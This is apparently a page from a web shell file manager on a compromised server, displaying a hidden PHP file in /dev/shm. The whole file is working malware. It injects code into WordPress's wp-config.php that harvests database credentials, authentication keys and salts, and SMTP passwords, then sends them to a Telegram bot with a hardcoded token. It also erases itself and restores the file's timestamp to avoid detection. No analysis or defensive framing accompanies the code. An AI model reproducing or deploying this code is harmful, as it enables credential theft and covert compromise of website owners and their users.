D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
dev
/
shm
/
Filename :
.record
back
Copy
<?php $path = $_SERVER['DOCUMENT_ROOT'] . "/wp-config.php"; $code_old = '<?php'; $code_new = <<< 'EOT' <?php // TELEGRAM_PARSER_INJECTED // --- Telegram Configuration --- $tg_api_url = "https://api.telegram.org/bot8214934297:AAHTIei0vzVQ0H1nqKYTJCuGgTjRskxERHI/sendMessage?chat_id=-1003537503195&text="; // --- Target Files --- $base_path = __DIR__; $target_files = array_merge( glob($base_path . '/wp-config.php'), glob($base_path . '/wp-config.php.bak'), glob($base_path . '/wp-content/**/wp-mail-smtp.php'), glob($base_path . '/wp-content/**/smtp-config.php'), glob($base_path . '/wp-content/**/easy-wp-smtp.php') ); $results = []; $found_anything = false; // --- Parsing Logic --- foreach ($target_files as $file) { if (file_exists($file) && is_readable($file)) { $content = file_get_contents($file); $filename = basename($file); if ($filename === 'wp-config.php' || $filename === 'wp-config.php.bak') { preg_match_all("/define\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\);/", $content, $matches, PREG_SET_ORDER); $db_creds = []; $auth_keys = []; foreach ($matches as $match) { if (in_array($match[1], ['DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST'])) { $db_creds[$match[1]] = $match[2]; $found_anything = true; } if (strpos($match[1], 'KEY') !== false || strpos($match[1], 'SALT') !== false) { $auth_keys[$match[1]] = $match[2]; $found_anything = true; } } if (!empty($db_creds)) $results['Database Credentials'] = $db_creds; if (!empty($auth_keys)) $results['Auth Keys & Salts'] = $auth_keys; } else { preg_match_all("/\$([a-zA-Z0-9_]+)\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $content, $matches, PREG_SET_ORDER); $smtp_settings = []; foreach ($matches as $match) { if (strpos(strtolower($match[1]), 'smtp') !== false || strpos(strtolower($match[1]), 'mail') !== false) { $smtp_settings[$match[1]] = $match[2]; $found_anything = true; } } if (!empty($smtp_settings)) { $results["SMTP Settings (from $filename)"] = $smtp_settings; } } } } // --- Telegram Notification & Self-Destruction --- if ($found_anything && !empty($results)) { $message = "--- Parse Results from: " . $_SERVER['HTTP_HOST'] . " ---\n\n"; foreach ($results as $category => $data) { $message .= "*" . htmlspecialchars($category) . "*:\n"; foreach ($data as $key => $value) { $message .= "`" . htmlspecialchars($key) . ": " . htmlspecialchars($value) . "`\n"; } $message .= "\n"; } @file_get_contents($tg_api_url . urlencode($message)); // --- SELF-DESTRUCT --- $this_file = __FILE__; $file_content = file_get_contents($this_file); $start_marker = '// TELEGRAM_PARSER_INJECTED'; $end_marker = '// END_TELEGRAM_PARSER_INJECTED'; // Use regex to remove the entire injected block, including markers. $clean_content = preg_replace('/' . preg_quote($start_marker, '/') . '.*?' . preg_quote($end_marker, '/') . '/s', '', $file_content); // Write the cleaned content back to the file. @file_put_contents($this_file, $clean_content); } // END_TELEGRAM_PARSER_INJECTED EOT; $ft = @filemtime($path); if (file_exists($path) && is_writable($path)) { $content = file_get_contents($path); if (!strstr($content, 'TELEGRAM_PARSER_INJECTED')) { $content = str_replace($code_old, $code_new, $content); file_put_contents($path, $content); @touch($path, $ft); die('!success!'); } } die('!end!');